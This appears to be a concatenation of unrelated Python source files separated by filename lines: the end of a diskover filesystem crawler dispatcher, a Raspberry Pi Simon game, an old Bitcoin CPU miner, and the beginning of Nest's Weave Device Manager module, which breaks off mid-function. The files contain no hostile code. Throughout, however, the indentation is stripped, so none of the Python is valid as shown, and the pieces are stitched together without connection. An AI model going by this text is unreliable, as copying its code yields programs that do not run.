logger.info("Storing on disk size instead of file size using a blocksize of %s (-S)" % cliargs['blocksize'])
if cliargs['adaptivebatch']:
batchsize = ab_start
cliargs['batchsize'] = batchsize
logger.info("Sending adaptive batches to worker bots (-a)")
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
logger.info("Sending batches of %s to worker bots", batchsize)
if batchsize < 50:
logger.warning("Using a small batch size can decrease performance")
# set maxdepth level to 1 if reindex
if cliargs['reindex']:
level = 1
cliargs['maxdepth'] = 1
else:
level = cliargs['maxdepth']
# set current depth
num_sep = path.count(os.path.sep)
# check for listenlwc socket cli flag to start socket server
if cliargs['listentwc']:
from diskover_socket_server import start_socket_server_twc
starttime = start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict)
return starttime
starttime = time.time()
logger.info("Starting crawl using %s treewalk threads (maxdepth %s)" % (cliargs['walkthreads'], cliargs['maxdepth']))
# start tree walking
treewalk(path, num_sep, level, batchsize, cliargs, logger, reindex_dict)
return starttime
except KeyboardInterrupt:
print("Ctrl-c keyboard interrupt, shutting down...")
sys.exit(0)
def hotdirs():
from diskover_bot_module import calc_hot_dirs
"""This is the calculate hot dirs function.
"""
logger.info('Getting diskover bots to calculate change percent '
'for directories from %s to %s',
cliargs['hotdirs'], cliargs['index'])
# look in index for all directory docs and add to queue
dirlist = index_get_docs(cliargs, logger, doctype='directory', hotdirs=True, index=cliargs['index'])
dirbatch = []
if cliargs['adaptivebatch']:
batchsize = ab_start
else:
batchsize = cliargs['batchsize']
if cliargs['verbose'] or cliargs['debug']:
logger.info('Batch size: %s' % batchsize)
for d in dirlist:
dirbatch.append(d)
if len(dirbatch) >= batchsize:
q.enqueue(calc_hot_dirs, args=(dirbatch, cliargs,), result_ttl=config['redis_ttl'])
del dirbatch[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q, cliargs, batchsize)
# add any remaining in batch to queue
q.enqueue(calc_hot_dirs, args=(dirbatch, cliargs,), result_ttl=config['redis_ttl'])
if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']:
bar = progress_bar('Checking')
bar.start()
else:
bar = None
# update progress bar until all bots are idle and q queue is empty
while worker_bots_busy([q]):
if bar:
try:
bar.update(len(q))
except (ZeroDivisionError, ValueError):
bar.update(0)
time.sleep(1)
if bar:
bar.finish()
def worker_bots_busy(queues):
"""This is the worker bots busy function.
It returns True when bots are busy and queues have jobs,
else returns False when bots are all idle and queues are empty.
"""
workers_busy = False
workers = SimpleWorker.all(connection=redis_conn)
for worker in workers:
if worker._state == "busy":
workers_busy = True
break
q_len = 0
running_jobs = 0
for qname in queues:
q_len += len(qname)
r = StartedJobRegistry(queue=qname)
running_job_ids = r.get_job_ids()
running_jobs += len(running_job_ids)
if q_len == 0 and running_jobs == 0 and workers_busy == False:
return False
else:
return True
def wait_for_worker_bots(logger):
"""This is the wait for worker bots function.
It loops waiting for worker bots to start.
"""
workers = SimpleWorker.all(connection=redis_conn)
while len(workers) == 0:
logger.info('Waiting for diskover worker bots to start...')
time.sleep(2)
workers = SimpleWorker.all(connection=redis_conn)
logger.info('Found %s diskover RQ worker bots', len(workers))
def tune_es_for_crawl(defaults=False):
"""This is the tune es for crawl function.
It optimizes ES for crawling based on config settings and after crawl is over
sets back to defaults.
"""
if config['disable_replicas'] == 'true':
replicas = 0
else:
replicas = config['index_replicas']
default_settings = {
"index": {
"refresh_interval": "1s",
"number_of_replicas": config['index_replicas'],
"translog.flush_threshold_size": "512mb"
}
}
tuned_settings = {
"index": {
"refresh_interval": config['index_refresh'],
"number_of_replicas": replicas,
"translog.flush_threshold_size": config['index_translog_size']
}
}
if not defaults:
logger.info("Tuning ES index settings for crawl")
es.indices.put_settings(index=cliargs['index'], body=tuned_settings,
request_timeout=config['es_timeout'])
else:
logger.info("Setting ES index settings back to defaults")
es.indices.put_settings(index=cliargs['index'], body=default_settings,
request_timeout=config['es_timeout'])
# set logging level for es to ERROR to not output any warnings about timeouts for index optimizing
logging.getLogger('elasticsearch').setLevel(logging.ERROR)
logger.info("Force merging ES index...")
es.indices.forcemerge(index=cliargs['index'], request_timeout=config['es_timeout'])
# check if we should optimize index
if cliargs['optimizeindex']:
logger.info('Optimizing ES index... this could take a while... (-O)')
try:
es.indices.forcemerge(index=cliargs['index'], max_num_segments=1, request_timeout=config['es_timeout'])
except exceptions.ConnectionTimeout:
logger.info("Optimizing timed out, will finish in background")
pass
def post_crawl_tasks():
"""This is the post crawl tasks function.
It runs at the end of the crawl and does post tasks.
"""
# add elapsed time crawl stat to es
add_crawl_stats(es, cliargs['index'], rootdir_path, (time.time() - starttime), "finished_crawl")
# calculate directory sizes and items
if cliargs['reindex'] or cliargs['reindexrecurs']:
calc_path = rootdir_path
else:
calc_path = None
calc_dir_sizes(cliargs, logger, path=calc_path)
# add elapsed time crawl stat to es
add_crawl_stats(es, cliargs['index'], rootdir_path, (time.time() - starttime), "finished_dircalc")
if cliargs['reindex'] or cliargs['reindexrecurs']:
# wait for worker bots to be idle and all queues are empty
logger.info('Waiting for diskover worker bots to be done with any jobs in rq...')
while worker_bots_busy([q, q_crawl, q_calc]):
time.sleep(1)
# set Elasticsearch index settings back to default
tune_es_for_crawl(defaults=True)
def pre_crawl_tasks():
# create Elasticsearch index
index_create(cliargs['index'])
# add crawl stat to index
add_crawl_stats(es, cliargs['index'], rootdir_path, 0, "running")
# optimize Elasticsearch index settings for crawling
tune_es_for_crawl()
# add disk space info to es index
if not cliargs['reindex'] and not cliargs['reindexrecurs']:
if cliargs['crawlapi']:
from diskover_crawlapi import api_add_diskspace
api_add_diskspace(es, cliargs['index'], rootdir_path, api_ses, logger)
else:
add_diskspace(cliargs['index'], logger, rootdir_path)
# load config file into config dictionary
config, configfile = load_config()
# set adaptive batch sizes from config
ab_start = config['adaptivebatch_startsize']
ab_max = config['adaptivebatch_maxsize']
ab_step = config['adaptivebatch_stepsize']
# load any available plugins
plugins = load_plugins()
import diskover_connections
# create Elasticsearch connection
diskover_connections.connect_to_elasticsearch()
from diskover_connections import es_conn as es
from diskover_connections import exceptions
# create Reddis connection
diskover_connections.connect_to_redis()
from diskover_connections import redis_conn
# Redis queue names
listen = [config['redis_queue'], config['redis_queue_crawl'], config['redis_queue_calcdir']]
# set up Redis q
q = Queue(listen[0], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
q_crawl = Queue(listen[1], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
q_calc = Queue(listen[2], connection=redis_conn, default_timeout=config['redis_rq_timeout'])
# queue for paths
q_paths = PyQueue()
q_paths_results = PyQueue()
q_paths_in_progress = PyQueue()
lock = Lock()
if __name__ == "__main__":
# parse cli arguments into cliargs dictionary
cliargs = vars(parse_cli_args(config['index']))
# set up logging
logger = log_setup(cliargs)
if not cliargs['quiet'] and not cliargs['gourcert'] and not cliargs['gourcemt']:
# print random banner
print_banner(version)
logger.info("Using config file: %s" % configfile)
# list plugins
if cliargs['listplugins']:
print("diskover plugins:")
list_plugins()
sys.exit(0)
# run just dir calcs if cli arg
if cliargs['dircalcsonly']:
calc_dir_sizes(cliargs, logger)
sys.exit(0)
try:
# check index name
if cliargs['index'] == "diskover" or \
cliargs['index'].split('-')[0] != "diskover":
print('Please name your index: diskover-<string>')
sys.exit(1)
except IndexError:
print('Please name your index: diskover-<string>')
sys.exit(1)
# check for listen socket cli flag to start socket server
if cliargs['listen']:
from diskover_socket_server import start_socket_server
start_socket_server(cliargs, logger)
sys.exit(0)
# check for gource cli flags
if cliargs['gourcert'] or cliargs['gourcemt']:
try:
from diskover_gource import gource
gource(es, cliargs)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, exiting')
sys.exit(0)
# tag duplicate files if cli argument
if cliargs['finddupes']:
from diskover_dupes import dupes_finder
wait_for_worker_bots(logger)
# Set up worker threads for duplicate file checker queue
dupes_finder(es, q, cliargs, logger)
logger.info('DONE checking for dupes! Sayonara!')
sys.exit(0)
# copy tags from index2 to index if cli argument
if cliargs['copytags']:
from diskover_bot_module import tag_copier
wait_for_worker_bots(logger)
logger.info('Copying tags from %s to %s', cliargs['copytags'], cliargs['index'])
# look in index2 for all directory docs with tags and add to queue
dirlist = index_get_docs(cliargs, logger, doctype='directory', copytags=True, index=cliargs['copytags'])
for path in dirlist:
q.enqueue(tag_copier, args=(path, cliargs,), result_ttl=config['redis_ttl'])
# look in index2 for all file docs with tags and add to queue
filelist = index_get_docs(cliargs, logger, doctype='file', copytags=True, index=cliargs['copytags'])
for path in filelist:
q.enqueue(tag_copier, args=(path, cliargs,), result_ttl=config['redis_ttl'])
if len(dirlist) == 0 and len(filelist) == 0:
logger.info('No tags to copy')
else:
logger.info('Worker bots copying tags in background')
logger.info('Dispatcher is DONE! Sayonara!')
sys.exit(0)
# Calculate directory change percent from index2 to index if cli argument
if cliargs['hotdirs']:
wait_for_worker_bots(logger)
hotdirs()
logger.info('DONE finding hotdirs! Sayonara!')
sys.exit(0)
# print plugins
plugins_list = ""
for i in get_plugins_info():
plugins_list = plugins_list + i["name"] + " "
if plugins:
logger.info("Plugins loaded: %s", plugins_list)
# check if rootdir exists
if cliargs['crawlapi']:
if cliargs['rootdir'] == '.' or cliargs['rootdir'] == "":
logger.error("Rootdir path missing, use -d /rootdir, exiting")
sys.exit(1)
from diskover_crawlapi import api_connection, api_stat, api_listdir
logger.info('Connecting to file system storage api at %s... (--crawlapi)' % config['api_url'])
api_ses = api_connection()
logger.info('Connected to storage api')
# check using storage api
try:
api_stat(cliargs['rootdir'], api_ses)
except ValueError as e:
logger.error("Rootdir path not found or not a directory, exiting (%s)" % e)
sys.exit(1)
elif cliargs['storagent']:
try:
import diskover_agent
except ImportError:
logger.error("Missing diskover_agent.py module, exiting")
sys.exit(1)
else:
# warn if not running as root (linux) or Administrator (windows)
try:
is_admin = os.geteuid() == 0
user = "root"
except AttributeError: # windows
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
user = "Administrator"
if not is_admin:
logger.warning('Not running as %s, permissions might block crawling some files' % user)
if not os.path.exists(cliargs['rootdir']) or not \
os.path.isdir(cliargs['rootdir']):
logger.error("Rootdir path not found or not a directory, exiting")
sys.exit(1)
logger.debug('Excluded dirs: %s', config['excluded_dirs'])
# set rootdir_path to absolute path
rootdir_path = os.path.abspath(cliargs['rootdir'])
# remove any trailing slash unless root /
if rootdir_path != '/':
rootdir_path = rootdir_path.rstrip(os.path.sep)
# check exclude
if dir_excluded(rootdir_path, config, cliargs):
logger.info("Directory in exclude list, exiting")
sys.exit(0)
cliargs['rootdir'] = rootdir_path
# convert to unicode if python2
if not IS_PY3:
rootdir_path = unicode(rootdir_path)
# warn if indexing 0 Byte empty files
if cliargs['minsize'] == 0:
logger.warning('You are indexing 0 Byte empty files (-s 0)')
# check if we are reindexing and remove existing docs in Elasticsearch
# before crawling and reindexing
reindex_dict = {'file': [], 'directory': []}
if cliargs['reindex']:
reindex_dict = index_delete_path(rootdir_path, cliargs, logger, reindex_dict)
elif cliargs['reindexrecurs']:
reindex_dict = index_delete_path(rootdir_path, cliargs, logger, reindex_dict, recursive=True)
pre_crawl_tasks()
# start crawling
starttime = crawl_tree(rootdir_path, cliargs, logger, reindex_dict)
post_crawl_tasks()
logger.info('All DONE! Sayonara!')
|
Simon.py
|
import RPi.GPIO as GPIO
#import GPIOmock as GPIO
import threading
import time
import random
import os
from subprocess import call
# green, red, blue, yellow
LIGHTS = [33, 37, 35, 31]
BUTTONS = [11, 15, 13, 7]
NOTES = ["E3", "A4", "E4", "Cs4"]
# values you can change that affect game play
speed = 0.25
use_sounds = True
# flags used to signal game status
is_displaying_pattern = False
is_won_current_level = False
is_game_over = False
# game state
current_level = 1
current_step_of_level = 0
pattern = []
def play_note(note):
if use_sounds:
call(["sonic_pi", "play :" + note])
def initialize_gpio():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(LIGHTS, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(BUTTONS, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
for i in range(4):
GPIO.add_event_detect(BUTTONS[i], GPIO.FALLING, verify_player_selection, 400 if use_sounds else 250)
def verify_player_selection(channel):
global current_step_of_level, current_level, is_won_current_level, is_game_over
if not is_displaying_pattern and not is_won_current_level and not is_game_over:
play_note(NOTES[BUTTONS.index(channel)])
flash_led_for_button(channel)
if channel == BUTTONS[pattern[current_step_of_level]]:
current_step_of_level += 1
if current_step_of_level >= current_level:
current_level += 1
is_won_current_level = True
else:
is_game_over = True
def flash_led_for_button(button_channel):
led = LIGHTS[BUTTONS.index(button_channel)]
GPIO.output(led, GPIO.HIGH)
time.sleep(0.1)
GPIO.output(led, GPIO.LOW)
def add_new_color_to_pattern():
global is_won_current_level, current_step_of_level
is_won_current_level = False
current_step_of_level = 0
next_color = random.randint(0, 3)
pattern.append(next_color)
def display_pattern_to_player():
global is_displaying_pattern
is_displaying_pattern = True
GPIO.output(LIGHTS, GPIO.LOW)
for i in range(current_level):
play_note(NOTES[pattern[i]])
GPIO.output(LIGHTS[pattern[i]], GPIO.HIGH)
time.sleep(speed)
GPIO.output(LIGHTS[pattern[i]], GPIO.LOW)
time.sleep(speed)
is_displaying_pattern = False
def wait_for_player_to_repeat_pattern():
while not is_won_current_level and not is_game_over:
time.sleep(0.1)
def reset_board_for_new_game():
global is_displaying_pattern, is_won_current_level, is_game_over
global current_level, current_step_of_level, pattern
is_displaying_pattern = False
is_won_current_level = False
is_game_over = False
current_level = 1
current_step_of_level = 0
pattern = []
GPIO.output(LIGHTS, GPIO.LOW)
def start_game():
while True:
add_new_color_to_pattern()
display_pattern_to_player()
wait_for_player_to_repeat_pattern()
if is_game_over:
print("Game Over! Your max score was {} colors!\n".format(current_level-1))
play_again = input("Enter 'Y' to play again, or just press [ENTER] to exit.\n")
if play_again == "Y" or play_again == "y":
reset_board_for_new_game()
print("Begin new round!\n")
else:
print("Thanks for playing!\n")
break
time.sleep(2)
def start_game_monitor():
t = threading.Thread(target=start_game)
t.daemon = True
t.start()
t.join()
def main():
try:
call(["sonic_pi", "set_sched_ahead_time! 0"])
call(["sonic_pi", "use_debug false"])
call(["sonic_pi", "use_synth :pulse"])
call(["sonic_pi", "use_bpm 100"])
os.system('cls' if os.name == 'nt' else 'clear')
print("Begin new round!\n")
initialize_gpio()
start_game_monitor()
finally:
GPIO.cleanup()
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8234
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
WeaveDeviceMgr.py
|
#
# Copyright (c) 2013-2018 Nest Labs, Inc.
# Copyright (c) 2019-2020 Google, LLC.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# @file
# Python interface for Weave Device Manager
#
"""Weave Device Manager interface
"""
from __future__ import absolute_import
from __future__ import print_function
import functools
import sys
import os
import re
import copy
import binascii
import datetime
import time
import glob
import platform
import ast
from threading import Thread, Lock, Event
from ctypes import *
import six
from six.moves import range
from .WeaveUtility import WeaveUtility
from .WeaveStack import *
__all__ = [ 'WeaveDeviceManager', 'NetworkInfo', 'DeviceDescriptor' ]
NetworkType_WiFi = 1
NetworkType_Thread = 2
WiFiMode_AdHoc = 1
WiFiMode_Managed = 2
WiFiRole_Station = 1
WiFiRole_AccessPoint = 2
WiFiSecurityType_None = 1
WiFiSecurityType_WEP = 2
WiFiSecurityType_WPAPersonal = 3
WiFiSecurityType_WPA2Personal = 4
WiFiSecurityType_WPA2MixedPersonal = 5
WiFiSecurityType_WPAEnterprise = 6
WiFiSecurityType_WPA2Enterprise = 7
WiFiSecurityType_WPA2MixedEnterprise = 8
WiFiSecurityType_WPA3Personal = 9
WiFiSecurityType_WPA3MixedPersonal = 10
WiFiSecurityType_WPA3Enterprise = 11
WiFiSecurityType_WPA3MixedEnterprise = 12
ThreadPANId_NotSpecified = 0xFFFFFFFF
ThreadChannel_NotSpecified = 0xFF
RendezvousMode_EnableWiFiRendezvousNetwork = 0x0001
RendezvousMode_Enable802154RendezvousNetwork = 0x0002
RendezvousMode_EnableFabricRendezvousAddress = 0x0004
TargetFabricId_AnyFabric = 0xFFFFFFFFFFFFFFFF
TargetFabricId_NotInFabric = 0
TargetDeviceMode_Any = 0x00000000 # Locate all devices regardless of mode.
TargetDeviceMode_UserSelectedMode = 0x00000001 # Locate all devices in 'user-selected' mode -- i.e. where the device has
# has been directly identified by a user, e.g. by pressing a button.
TargetVendorId_Any = 0xFFFF
TargetProductId_Any = 0xFFFF
TargetDeviceId_Any = 0xFFFFFFFFFFFFFFFF
DeviceFeature_HomeAlarmLinkCapable = 0x00000001 # Indicates a Nest Protect that supports connection to a home alarm panel
DeviceFeature_LinePowered = 0x00000002 # Indicates a device that requires line power
SystemTest_ProductList = { 'thermostat' : 0x235A000A,
'topaz' : 0x235A0003}
DeviceDescriptorFlag_IsRendezvousWiFiESSIDSuffix = 0x01
class NetworkInfo:
def __init__(self, networkType=None, networkId=None, wifiSSID=None, wifiMode=None, wifiRole=None,
wifiSecurityType=None, wifiKey=None,
threadNetworkName=None, threadExtendedPANId=None, threadNetworkKey=None, threadPSKc=None,
wirelessSignalStrength=None, threadPANId=None, threadChannel=None):
self.NetworkType = networkType
self.NetworkId = networkId
self.WiFiSSID = wifiSSID
self.WiFiMode = wifiMode
self.WiFiRole = wifiRole
self.WiFiSecurityType = wifiSecurityType
self.WiFiKey = wifiKey
self.ThreadNetworkName = threadNetworkName
self.ThreadExtendedPANId = threadExtendedPANId
self.ThreadNetworkKey = threadNetworkKey
self.ThreadPSKc = threadPSKc
self.ThreadPANId = threadPANId
self.ThreadChannel = threadChannel
self.WirelessSignalStrength = wirelessSignalStrength
def Print(self, prefix=""):
print("%sNetwork Type: %s" % (prefix, NetworkTypeToString(self.NetworkType)))
if self.NetworkId != None:
print("%sNetwork Id: %d" % (prefix, self.NetworkId))
if self.WiFiSSID != None:
print("%sWiFi SSID: \"%s\"" % (prefix, self.WiFiSSID))
if self.WiFiMode != None:
print("%sWiFi Mode: %s" % (prefix, WiFiModeToString(self.WiFiMode)))
if self.WiFiRole != None:
print("%sWiFi Role: %s" % (prefix, WiFiRoleToString(self.WiFiRole)))
if self.WiFiSecurityType != None:
print("%sWiFi Security Type: %s" % (prefix, WiFiSecurityTypeToString(self.WiFiSecurityType)))
if self.WiFiKey != None:
print("%sWiFi Key: %s" % (prefix, self.WiFiKey))
if self.ThreadNetworkName != None:
print("%sThread Network Name: \"%s\"" % (prefix, self.ThreadNetworkName))
if self.ThreadExtendedPANId != None:
print("%sThread Extended PAN Id: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadExtendedPANId)))
if self.ThreadNetworkKey != None:
print("%sThread Network Key: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadNetworkKey)))
if self.ThreadPSKc != None:
print("%sThread Network PSKc: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.ThreadPSKc)))
if self.ThreadPANId != None:
print("%sThread PAN Id: %04x" % (prefix, self.ThreadPANId))
if self.ThreadChannel != None:
print("%sThread Channel: %d" % (prefix, self.ThreadChannel))
if self.WirelessSignalStrength != None:
print("%sWireless Signal Strength: %s" % (prefix, self.WirelessSignalStrength))
def SetField(self, name, val):
name = name.lower();
if (name == 'networktype' or name == 'network-type' or name == 'type'):
self.NetworkType = ParseNetworkType(val)
elif (name == 'networkid' or name == 'network-id' or name == 'id'):
self.NetworkId = int(val)
elif (name == 'wifissid' or name == 'wifi-ssid' or name == 'ssid'):
self.WiFiSSID = val
elif (name == 'wifimode' or name == 'wifi-mode'):
self.WiFiMode = ParseWiFiMode(val)
elif (name == 'wifirole' or name == 'wifi-role'):
self.WiFiRole = ParseWiFiRole(val)
elif (name == 'wifisecuritytype' or name == 'wifi-security-type' or name == 'securitytype' or name == 'security-type' or name == 'wifi-security' or name == 'security'):
self.WiFiSecurityType = ParseSecurityType(val)
elif (name == 'wifikey' or name == 'wifi-key' or name == 'key'):
self.WiFiKey = val
elif (name == 'threadnetworkname' or name == 'thread-network-name' or name == 'thread-name'):
self.ThreadNetworkName = val
elif (name == 'threadextendedpanid' or name == 'thread-extended-pan-id'):
self.ThreadExtendedPANId = val
elif (name == 'threadnetworkkey' or name == 'thread-network-key' or name == 'thread-key'):
self.ThreadNetworkKey = val
elif (name == 'threadpskc' or name == 'thread-pskc' or name == 'pskc'):
self.ThreadPSKc = val
elif (name == 'threadpanid' or name == 'thread-pan-id' or name == 'pan-id'):
self.ThreadPANId = val
elif (name == 'threadchannel' or name == 'thread-channel'):
self.ThreadChannel = val
elif (name == 'wirelesssignalstrength' or name == 'wireless-signal-strength'):
self.WirelessSignalStrength = val
else:
raise Exception("Invalid NetworkInfo field: " + str(name))
class DeviceDescriptor:
def __init__(self, deviceId=None, fabricId=None, vendorId=None, productId=None, productRevision=None,
manufacturingYear=None, manufacturingMonth=None, manufacturingDay=None,
primary802154MACAddress=None, primaryWiFiMACAddress=None,
serialNumber=None, softwareVersion=None, rendezvousWiFiESSID=None, pairingCode=None,
pairingCompatibilityVersionMajor=None, pairingCompatibilityVersionMinor=None,
deviceFeatures=None, flags=None):
self.DeviceId = deviceId
self.FabricId = fabricId
self.VendorId = vendorId
self.ProductId = productId
self.ProductRevision = productRevision
self.ManufacturingYear = manufacturingYear
self.ManufacturingMonth = manufacturingMonth
self.ManufacturingDay = manufacturingDay
self.Primary802154MACAddress = primary802154MACAddress
self.PrimaryWiFiMACAddress = primaryWiFiMACAddress
self.SerialNumber = serialNumber
self.SoftwareVersion = softwareVersion
self.RendezvousWiFiESSID = rendezvousWiFiESSID
self.PairingCode = pairingCode
self.PairingCompatibilityVersionMajor = pairingCompatibilityVersionMajor
self.PairingCompatibilityVersionMinor = pairingCompatibilityVersionMinor
self.DeviceFeatures = [ ]
if deviceFeatures != None:
featureVal = 1
while featureVal != 0x80000000:
if (deviceFeatures & featureVal) == featureVal:
self.DeviceFeatures.append(featureVal)
featureVal <<= 1
self.Flags = flags if flags != None else 0
def Print(self, prefix=""):
if self.DeviceId != None:
print("%sDevice Id: %016X" % (prefix, self.DeviceId))
if self.FabricId != None:
print("%sFabrid Id: %016X" % (prefix, self.FabricId))
if self.VendorId != None:
print("%sVendor Id: %X" % (prefix, self.VendorId))
if self.ProductId != None:
print("%sProduct Id: %X" % (prefix, self.ProductId))
if self.ProductRevision != None:
print("%sProduct Revision: %X" % (prefix, self.ProductRevision))
if self.SerialNumber != None:
print("%sSerial Number: %s" % (prefix, self.SerialNumber))
if self.SoftwareVersion != None:
print("%sSoftware Version: %s" % (prefix, self.SoftwareVersion))
if self.ManufacturingYear != None and self.ManufacturingMonth != None:
if self.ManufacturingDay != None:
print("%sManufacturing Date: %04d/%02d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth, self.ManufacturingDay))
else:
print("%sManufacturing Date: %04d/%02d" % (prefix, self.ManufacturingYear, self.ManufacturingMonth))
if self.Primary802154MACAddress != None:
print("%sPrimary 802.15.4 MAC Address: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.Primary802154MACAddress)))
if self.PrimaryWiFiMACAddress != None:
print("%sPrimary WiFi MAC Address: %s" % (prefix, WeaveUtility.ByteArrayToHex(self.PrimaryWiFiMACAddress)))
if self.RendezvousWiFiESSID != None:
print("%sRendezvous WiFi ESSID%s: %s" % (prefix, " Suffix" if self.IsRendezvousWiFiESSIDSuffix else "", self.RendezvousWiFiESSID))
if self.PairingCode != None:
print("%sPairing Code: %s" % (prefix, self.PairingCode))
if self.PairingCompatibilityVersionMajor != None:
print("%sPairing Compatibility Major Id: %X" % (prefix, self.PairingCompatibilityVersionMajor))
if self.PairingCompatibilityVersionMinor != None:
